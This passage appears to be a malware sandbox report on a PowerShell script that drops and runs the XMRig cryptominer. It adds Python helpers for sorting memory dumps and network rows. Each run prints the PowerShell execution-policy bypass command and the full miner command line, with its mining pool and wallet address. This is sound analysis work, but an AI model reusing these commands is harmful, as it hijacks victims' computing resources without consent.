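memory/2184-117-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp
memory/3452-48-0x00007FF718720000-0x00007FF719353000-memory.dmp
memory/2408-48-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp
memory/4072-93-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp
""".split()

IMAGE_RANGE_START = 0x7FF0_0000_0000   # assumed: where x64 Windows maps images under ASLR
MIN_IMAGE_SIZE = 1 << 20               # assumed: ignore small pages that also land up there


def parse_dump_name(name):
    m = DUMP_NAME.match(name)
    if not m:
        return None
    start, end = int(m['start'], 16), int(m['end'], 16)
    return {'pid': int(m['pid']), 'idx': int(m['idx']),
            'start': start, 'end': end, 'size': end - start}


def summarise_regions(names):
    """One entry per (pid, start, end) with the number of snapshots and index span."""
    regions = {}
    for name in names:
        d = parse_dump_name(name)
        if d is None:
            continue
        key = (d['pid'], d['start'], d['end'])
        r = regions.setdefault(key, {'pid': d['pid'], 'start': d['start'], 'end': d['end'],
                                     'size': d['size'], 'snapshots': 0,
                                     'first_idx': d['idx'], 'last_idx': d['idx']})
        r['snapshots'] += 1
        r['first_idx'] = min(r['first_idx'], d['idx'])
        r['last_idx'] = max(r['last_idx'], d['idx'])
    return sorted(regions.values(), key=lambda r: (r['pid'], -r['size']))


def likely_image_regions(regions):
    """Large mappings in the image range: the candidates to carve or scan with YARA."""
    return [r for r in regions
            if r['start'] >= IMAGE_RANGE_START and r['size'] >= MIN_IMAGE_SIZE]


def same_size_across_pids(regions):
    """size -> [(pid, start), ...] for sizes that occur under more than one PID.
    Same size at a different base in every process is one binary under per-process ASLR."""
    by_size = defaultdict(list)
    for r in regions:
        by_size[r['size']].append((r['pid'], r['start']))
    return {size: sorted(v) for size, v in by_size.items() if len({p for p, _ in v}) > 1}


if __name__ == '__main__':
    regions = summarise_regions(DUMPS)
    for r in likely_image_regions(regions):
        print(f"pid {r['pid']:>5}  0x{r['start']:016X}-0x{r['end']:016X}  size 0x{r['size']:X}  "
              f"snapshots {r['snapshots']} (idx {r['first_idx']}..{r['last_idx']})")
    for size, where in same_size_across_pids(regions).items():
        print(f"size 0x{size:X} recurs in PIDs {sorted({p for p, _ in where})}")
```

Run over the full listings, every xmrig PID on this page has exactly one 0xC33000-byte image-range region at a different base, which is what a single dropped binary looks like across runs; that region is the one to pull for string extraction or signature work, and the dozens of repeated snapshots of it add nothing beyond timing.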

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:39

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1772s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits; the sandbox recorded no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
IE 52.111.236.22:443 - tcp

Files

memory/2656-0-0x00007FFC80FE3000-0x00007FFC80FE5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pf0knquv.i02.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2656-9-0x000001EFCC370000-0x000001EFCC392000-memory.dmp

memory/2656-10-0x00007FFC80FE0000-0x00007FFC81AA2000-memory.dmp

memory/2656-11-0x00007FFC80FE0000-0x00007FFC81AA2000-memory.dmp

memory/2656-12-0x00007FFC80FE0000-0x00007FFC81AA2000-memory.dmp

memory/2656-14-0x000001EFCC410000-0x000001EFCC422000-memory.dmp

memory/2656-15-0x000001EFCC3E0000-0x000001EFCC3EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3452-46-0x000002D8B87C0000-0x000002D8B87E0000-memory.dmp

memory/3452-47-0x000002D8B8810000-0x000002D8B8830000-memory.dmp

memory/3452-48-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/2656-49-0x00007FFC80FE0000-0x00007FFC81AA2000-memory.dmp

memory/3452-51-0x000002D8B8830000-0x000002D8B8850000-memory.dmp

memory/3452-50-0x000002D8B8850000-0x000002D8B8870000-memory.dmp

memory/2656-53-0x00007FFC80FE3000-0x00007FFC80FE5000-memory.dmp

memory/3452-52-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-54-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-55-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-57-0x000002D8B8830000-0x000002D8B8850000-memory.dmp

memory/3452-56-0x000002D8B8850000-0x000002D8B8870000-memory.dmp

memory/3452-58-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-59-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-60-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-61-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-62-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-63-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-64-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-65-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-66-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-67-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-68-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-69-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-70-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-71-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-72-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-73-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-74-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-75-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-76-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-77-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-78-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-79-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-80-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-81-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-82-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-83-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-84-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-85-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-86-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-87-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-88-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-89-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-90-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-91-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-92-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-93-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-94-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-95-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-96-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-97-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-98-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-99-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-100-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-101-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-102-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-103-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-104-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-105-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-106-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-107-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-108-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-109-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-110-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-111-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-112-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-113-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-114-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-115-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-116-0x00007FF718720000-0x00007FF719353000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:04

Platform

win11-20240508-en

Max time kernel

1791s

Max time network

1783s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits; the sandbox recorded no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
IE 52.111.236.22:443 - tcp

Files

memory/1656-0-0x00007FFA20DB3000-0x00007FFA20DB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_magvjwhg.hz3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1656-6-0x000001887EE00000-0x000001887EE22000-memory.dmp

memory/1656-10-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp

memory/1656-11-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp

memory/1656-12-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp

memory/1656-14-0x000001887F330000-0x000001887F342000-memory.dmp

memory/1656-15-0x000001887F320000-0x000001887F32A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2408-46-0x00000266CD260000-0x00000266CD280000-memory.dmp

memory/2408-47-0x00000266CD2A0000-0x00000266CD2C0000-memory.dmp

memory/2408-48-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/1656-49-0x00007FFA20DB3000-0x00007FFA20DB5000-memory.dmp

memory/1656-50-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp

memory/2408-53-0x00000266CD2C0000-0x00000266CD2E0000-memory.dmp

memory/2408-51-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-52-0x00000266CD2E0000-0x00000266CD300000-memory.dmp

memory/1656-54-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp

memory/2408-55-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-56-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-57-0x00000266CD2E0000-0x00000266CD300000-memory.dmp

memory/2408-58-0x00000266CD2C0000-0x00000266CD2E0000-memory.dmp

memory/2408-59-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-60-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-61-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-62-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-63-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-64-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-65-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-66-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-67-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-68-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-69-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-70-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-71-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-72-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-73-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-74-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-75-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-76-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-77-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-78-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-79-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-80-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-81-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-82-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-83-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-84-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-85-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-86-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-87-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-88-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-89-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-90-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-91-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-92-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-93-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-94-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-95-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-96-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-97-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-98-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-99-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-100-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-101-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-102-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-103-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-104-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-105-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-106-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-107-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-108-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-109-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-110-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-111-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-112-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-113-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-114-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-115-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-116-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-117-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:25

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1786s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits; the sandbox recorded no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
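This run's network table is the fullest on the page: it records reverse (PTR) lookups as well as the forward lookups and TCP connections. The Python below is an added example, not part of the report: it parses the flattened table, turns each in-addr.arpa name back into the address it refers to, and joins that against the TCP destinations, so PTR lookups for addresses the table never shows a connection to stand out from those that simply name the hosts already contacted. The rows are copied from this analysis plus the domain-less `52.111.236.22:443` row from behavioral32 and behavioral4, included to exercise the three-column case; the pool host is taken from the xmrig command line; the category names are mine.

```python
"""Parse the flattened Network table and correlate reverse lookups with connections.

Added example, not part of the report.  Rows are copied from this analysis
(behavioral18) plus the domain-less row from behavioral32; the pool host comes
from the xmrig command line; the category names are assumptions made here.
"""
import ipaddress

NETWORK_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
IE 52.111.236.22:443 tcp
"""
POOL_HOSTS = {'rx.unmineable.com'}   # the -o host from the xmrig command line


def parse_network_rows(table):
    """Rows have four columns, or three when the Domain cell is empty."""
    rows = []
    for line in table.splitlines():
        parts = line.split()
        if len(parts) not in (3, 4) or parts[0] == 'Country':
            continue
        ip, _, port = parts[1].rpartition(':')
        rows.append({'country': parts[0], 'ip': ip, 'port': int(port),
                     'domain': parts[2] if len(parts) == 4 else None, 'proto': parts[-1]})
    return rows


def ptr_to_ip(name):
    """'215.156.26.20.in-addr.arpa' -> '20.26.156.215'; None if not an IPv4 PTR name."""
    suffix = '.in-addr.arpa'
    if not name or not name.endswith(suffix):
        return None
    octets = name[:-len(suffix)].split('.')
    if len(octets) != 4:
        return None
    try:
        return str(ipaddress.IPv4Address('.'.join(reversed(octets))))
    except ipaddress.AddressValueError:
        return None


def correlate(rows, pool_hosts=frozenset()):
    queried = {r['domain'] for r in rows
               if r['proto'] == 'udp' and r['port'] == 53 and r['domain']}
    ptr_ips = {ptr_to_ip(d) for d in queried} - {None}
    forward_names = {d for d in queried if ptr_to_ip(d) is None}
    tcp = [r for r in rows if r['proto'] == 'tcp']
    contacted = {r['ip'] for r in tcp}
    return {
        # mining pool traffic, keyed on the host the miner was told to use
        'pool_connections': sorted((r['ip'], r['port']) for r in tcp if r['domain'] in pool_hosts),
        # everything else over TCP (here: the GitHub hosts contacted while the script ran)
        'other_tcp': {r['ip']: r['domain'] for r in tcp if r['domain'] not in pool_hosts},
        # connections whose name was never resolved in the capture, or that had no name
        'tcp_without_dns_query': sorted(r['ip'] for r in tcp if r['domain'] not in forward_names),
        # reverse lookups that name an address the table shows a connection to ...
        'ptr_for_contacted_ip': ptr_ips & contacted,
        # ... and reverse lookups for addresses the table never shows a connection to
        'ptr_without_connection': ptr_ips - contacted,
    }


if __name__ == '__main__':
    for key, value in correlate(parse_network_rows(NETWORK_TABLE), POOL_HOSTS).items():
        print(f'{key}: {value}')
```

Three of the six PTR lookups here (for 52.111.243.30, 52.168.117.170 and 2.18.24.18) have no matching connection anywhere in the table, so they are most plausibly the platform's own background traffic rather than something the script did; the other three just name the GitHub and pool addresses already listed. The single TCP destination with no name and no lookup, 52.111.236.22, is the one an analyst would have to attribute by other means.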

Files

memory/4532-2-0x00007FF8C1D43000-0x00007FF8C1D44000-memory.dmp

memory/4532-5-0x0000014B5C670000-0x0000014B5C692000-memory.dmp

memory/4532-6-0x00007FF8C1D40000-0x00007FF8C272C000-memory.dmp

memory/4532-9-0x00007FF8C1D40000-0x00007FF8C272C000-memory.dmp

memory/4532-10-0x0000014B74CB0000-0x0000014B74D26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_niydenne.gok.ps1 (written by powershell.exe itself when it probes the AppLocker/WDAC script policy at startup; not a file dropped by the sample, so do not treat its hashes as IOCs)

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4532-25-0x00007FF8C1D40000-0x00007FF8C272C000-memory.dmp

memory/4532-48-0x0000014B74E30000-0x0000014B74E42000-memory.dmp

memory/4532-61-0x0000014B5C6A0000-0x0000014B5C6AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4072-90-0x000001C22E0C0000-0x000001C22E0E0000-memory.dmp

memory/4532-91-0x00007FF8C1D43000-0x00007FF8C1D44000-memory.dmp

memory/4532-92-0x00007FF8C1D40000-0x00007FF8C272C000-memory.dmp

